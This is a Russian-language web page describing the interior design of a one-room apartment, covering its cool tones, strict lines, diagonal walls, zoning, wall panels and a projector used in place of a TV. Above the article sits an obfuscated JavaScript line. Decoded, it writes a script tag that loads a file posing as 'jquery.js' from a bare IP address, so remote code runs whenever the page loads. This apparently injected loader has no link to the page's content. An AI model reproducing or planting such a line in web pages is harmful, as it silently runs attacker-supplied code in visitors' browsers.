var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));

В основу создания проекта легли холодные тона и строгие линии. Использование мягкого, светлого текстиля уравновешивают мужской стиль, а большое количество света и его разноплановость добавляют лёгкости.

Используемые припланировки, диагональные стены помогают объединению зон, чем в свою очередь увеличивают общее пространство однокомнатной квартиры. Зонирование этой квартиры вполне классическое – общая кухня-гостиная, спальное место и отдельное рабочее место на лоджии.

В гостиной и спальне использованы характерные стеновые панели, которые разбавляют общую спокойную динамику стен. Следует отметить нестандартное решение замены в зоне гостиной привычного ТВ на проектор. И, в целом, в проекте использованы интересные детали, будь то светильник в прихожей, напоминающий арт-объект, либо настенные часы на кухне.

Таким образом, в этом проекте удалось реализовать логичное функциональное зонирование и сочетание строгих линий с мягкостью.